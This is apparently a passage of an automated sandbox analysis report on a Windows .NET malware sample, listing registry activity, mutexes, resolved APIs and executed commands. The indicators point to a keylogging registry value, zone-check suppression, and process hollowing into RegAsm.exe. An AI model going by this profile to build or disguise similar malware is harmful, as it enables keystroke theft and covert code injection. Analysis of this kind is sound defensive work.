HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_CURRENT_USER\Software\3e2ba6e27f6c302ca8093546541e02ce\[kl]
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\CurrentBuildNumber
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TCPIP6\Parameters\DisabledComponents
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\iphlpsvc\config\Connectivity_Platform_Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.44.3.4!7\Name
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings\StringCacheGeneration
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\p2pcollab.dll,-8042
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.47.1.1!7\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.64.1.1!7\Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dnsapi.dll,-103
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Enable Tracing
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\Tracing Level
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Friendly Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-100
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Description
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Version
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-103
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Vendor Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-102
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Info Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Config Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Validator Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Registration Date
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79617\Component Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Friendly Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Description
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-2
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Version
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-4
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Vendor Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-3
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Info Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Config Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Validator Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Registration Date
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79619\Component Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Friendly Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-100
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Description
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Version
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-102
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Vendor Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-103
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Info Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Config Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Validator Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Registration Date
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79621\Component Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Friendly Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-100
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Description
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-101
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Version
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-102
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Vendor Name
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-103
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Info Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Config Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Validator Clsid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Registration Date
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\Qecs\79623\Component Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\napagent\LocalConfig\PlumbIpsecPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F6C4EC9A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Service\Enable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Service\PolicyRefreshInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\TransportDllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DownloadManager\CryptoAlgo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\SecurityManager\BlockSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\SecurityManager\NumBlocksPerSegment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\SecurityManager\Restricted\Seed
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\ServerRole
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\ClientAuth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\TransportDllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\MaxSimultaneousDownloads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\MaxSimultaneousUploads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\MaxPendingOffers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\MaxPendingDownloads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\HostedCache\DoNotUseSSL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DiscoveryManager\RepubQuorumSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DiscoveryManager\MinBackoffWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\DiscoveryManager\DiscoveryProviderDllPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Roaming\ForceRoamingDetect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Roaming\RefreshDllName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\PeerDist\Roaming\RefreshProcName

Write Keys

HKEY_CURRENT_USER\di
HKEY_CURRENT_USER\Environment\SEE_MASK_NOZONECHECKS
HKEY_CURRENT_USER\Software\3e2ba6e27f6c302ca8093546541e02ce
HKEY_CURRENT_USER\Software\3e2ba6e27f6c302ca8093546541e02ce\[kl]
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\LanguageList
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-103
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\dhcpqec.dll,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-1
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-2
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-4
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\napipsec.dll,-3
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\tsgqec.dll,-103
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-100
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-101
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-102
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\4B\7F06864B\@%SystemRoot%\system32\eapqec.dll,-103

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
3e2ba6e27f6c302ca8093546541e02ce
Global\.net clr networking

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
clr.dll.SetRuntimeInfo
clr.dll._CorExeMain
mscoree.dll.CreateConfigStream
mscoreei.dll.CreateConfigStream
kernel32.dll.GetNumaHighestNodeNumber
kernel32.dll.GetSystemWindowsDirectoryW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddSIDToBoundaryDescriptor
kernel32.dll.CreateBoundaryDescriptorW
kernel32.dll.CreatePrivateNamespaceW
kernel32.dll.OpenPrivateNamespaceW
kernel32.dll.DeleteBoundaryDescriptor
kernel32.dll.WerRegisterRuntimeExceptionModule
kernel32.dll.RaiseException
mscoree.dll.#24
mscoreei.dll.#24
ntdll.dll.NtSetSystemInformation
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.GetNativeSystemInfo
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
clrjit.dll.sxsJitStartup
clrjit.dll.getJit
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcess
kernel32.dll.LocaleNameToLCID
kernel32.dll.LCIDToLocaleName
kernel32.dll.GetUserPreferredUILanguages
nlssorting.dll.SortGetHandle
nlssorting.dll.SortCloseHandle
kernel32.dll.GetTempPathW
ole32.dll.CoTaskMemAlloc
ole32.dll.CoTaskMemFree
kernel32.dll.GetFullPathNameW
cryptsp.dll.CryptGetDefaultProviderW
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.SetThreadErrorMode
kernel32.dll.CreateFileW
kernel32.dll.GetFileType
kernel32.dll.WriteFile
kernel32.dll.GetFileAttributesExW
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.GetStdHandle
kernel32.dll.GetEnvironmentStrings
kernel32.dll.GetEnvironmentStringsW
kernel32.dll.FreeEnvironmentStringsW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.CreateProcessW
kernel32.dll.DuplicateHandle
kernel32.dll.GetExitCodeProcess
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.DeleteFileW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
kernel32.dll.FindResourceA
kernel32.dll.SizeofResource
kernel32.dll.LoadResource
kernel32.dll.LockResource
gdiplus.dll.GdiplusStartup
kernel32.dll.IsProcessorFeaturePresent
user32.dll.GetWindowInfo
user32.dll.GetAncestor
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayMonitors
user32.dll.EnumDisplayDevicesA
gdi32.dll.ExtTextOutW
gdi32.dll.GdiIsMetaPrintDC
gdiplus.dll.GdipCreateBitmapFromStream
windowscodecs.dll.DllGetClassObject
kernel32.dll.WerRegisterMemoryBlock
gdiplus.dll.GdipImageForceValidation
gdiplus.dll.GdipGetImageRawFormat
gdiplus.dll.GdipGetImageWidth
gdiplus.dll.GdipGetImageHeight
gdiplus.dll.GdipBitmapGetPixel
shell32.dll.SHGetFolderPathW
kernel32.dll.CopyFileW
kernel32.dll.DeleteFileA
kernel32.dll.WideCharToMultiByte
kernel32.dll.LoadLibraryA
kernel32.dll.GetProcAddress
kernel32.dll.GetModuleHandleA
advapi32.dll.LookupPrivilegeValueW
advapi32.dll.AdjustTokenPrivileges
ntdll.dll.NtQuerySystemInformation
kernel32.dll.CreateProcessA
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.ReadProcessMemory
kernel32.dll.WriteProcessMemory
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.VirtualAllocEx
kernel32.dll.ResumeThread
ole32.dll.CoUninitialize
oleaut32.dll.#500
gdiplus.dll.GdipDisposeImage
cryptsp.dll.CryptReleaseContext
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
kernel32.dll.QueryActCtxW
advapi32.dll.EventUnregister
kernel32.dll.GetProcessPreferredUILanguages
kernel32.dll.GetUserDefaultUILanguage
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
alink.dll.CreateALink
mscoree.dll.CLRCreateInstance
mscoreei.dll.CLRCreateInstance
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptGetHashParam
cryptsp.dll.CryptDestroyHash
clr.dll.DllGetClassObjectInternal
clr.dll.StrongNameTokenFromPublicKey
clr.dll.StrongNameFreeBuffer
clr.dll.CompareAssemblyIdentityWithConfig
clr.dll.CreateAssemblyConfigCookie
clr.dll.DestroyAssemblyConfigCookie
clr.dll.CreateAssemblyNameObject
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
mscorpehost.dll.InitializeSxS
mscorpehost.dll.CreateICeeFileGen
mscorpehost.dll.DestroyICeeFileGen
ole32.dll.CoCreateGuid
diasymreader.dll.DllGetClassObject
rpcrt4.dll.UuidCreate
kernel32.dll.NlsGetCacheUpdateCount
ole32.dll.CreateStreamOnHGlobal
mscoree.dll.CorExitProcess
mscoreei.dll.CorExitProcess
kernel32.dll.InitializeCriticalSectionAndSpinCount
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
kernel32.dll.GetVersionExW
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
cryptsp.dll.CryptVerifySignatureA
mscorjit.dll.getJit
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
advapi32.dll.RegSetValueExW
kernel32.dll.ReleaseMutex
kernel32.dll.CreateMutexW
user32.dll.SendMessageTimeoutA
kernel32.dll.GetStartupInfoW
kernel32.dll.WaitForSingleObject
kernel32.dll.SwitchToThread
kernel32.dll.SetErrorMode
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
user32.dll.GetAsyncKeyState
user32.dll.RegisterWindowMessageW
user32.dll.GetKeyState
kernel32.dll.GetCurrentThread
kernel32.dll.GetCurrentThreadId
user32.dll.GetSystemMetrics
kernel32.dll.GetModuleHandleW
user32.dll.DefWindowProcW
gdi32.dll.GetStockObject
user32.dll.RegisterClassW
user32.dll.CreateWindowExW
user32.dll.SetWindowLongW
user32.dll.GetWindowLongW
user32.dll.CallWindowProcW
user32.dll.GetClientRect
user32.dll.GetWindowRect
user32.dll.GetParent
ole32.dll.OleInitialize
ole32.dll.CoRegisterMessageFilter
user32.dll.PeekMessageW
mscoree.dll.ND_RI2
mscoreei.dll.ND_RI2
ws2_32.dll.WSAStartup
ws2_32.dll.WSASocketW
ws2_32.dll.setsockopt
ws2_32.dll.WSAEventSelect
ws2_32.dll.ioctlsocket
ws2_32.dll.closesocket
kernel32.dll.GetCurrentProcessId
kernel32.dll.GetComputerNameW
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW
kernel32.dll.LocalFree
kernel32.dll.CreateFileMappingW
kernel32.dll.MapViewOfFile
kernel32.dll.VirtualQuery
advapi32.dll.CreateWellKnownSid
kernel32.dll.OpenMutexW
kernel32.dll.OpenProcess
kernel32.dll.GetProcessTimes
ws2_32.dll.getaddrinfo
ws2_32.dll.freeaddrinfo
ws2_32.dll.WSAConnect
kernel32.dll.FormatMessageW
kernel32.dll.GetProcessWorkingSetSize
kernel32.dll.SetProcessWorkingSetSize
user32.dll.GetKeyboardState
user32.dll.MapVirtualKeyA
user32.dll.GetForegroundWindow
user32.dll.GetWindowThreadProcessId
user32.dll.GetKeyboardLayout
user32.dll.ToUnicodeEx
ws2_32.dll.shutdown
user32.dll.GetWindowTextLengthA
user32.dll.GetWindowTextA
advapi32.dll.RegCreateKeyExW
rasmontr.dll.InitHelperDll
nshwfp.dll.InitHelperDll
dhcpcmonitor.dll.InitHelperDll
wshelper.dll.InitHelperDll
nshhttp.dll.InitHelperDll
fwcfg.dll.InitHelperDll
authfwcfg.dll.InitHelperDll
ifmon.dll.InitHelperDll
netiohlp.dll.InitHelperDll
whhelper.dll.InitHelperDll
hnetmon.dll.InitHelperDll
rpcnsh.dll.InitHelperDll
dot3cfg.dll.InitHelperDll
napmontr.dll.InitHelperDll
nshipsec.dll.InitHelperDll
p2pnetsh.dll.InitHelperDll
wlancfg.dll.InitHelperDll
peerdistsh.dll.InitHelperDll
cryptsp.dll.CryptEnumProvidersW
user32.dll.LoadStringW
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceConfigW
sechost.dll.CloseServiceHandle
sechost.dll.QueryServiceStatus
sechost.dll.LookupAccountNameLocalW
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
rpcrtremote.dll.I_RpcExtInitializeExtensionPoint
httpapi.dll.HttpInitialize
userenv.dll.RegisterGPNotification
userenv.dll.UnregisterGPNotification
gpapi.dll.RegisterGPNotificationInternal
bcryptprimitives.dll.GetHashInterface
bcryptprimitives.dll.GetCipherInterface
kernel32.dll.SetThreadUILanguage
mprmsg.dll.MprmsgGetErrorString
httpapi.dll.HttpTerminate
gpapi.dll.UnregisterGPNotificationInternal
oleaut32.dll.#9
comctl32.dll.#388

Execute Commands

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\vggjmtxd.cmdline"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
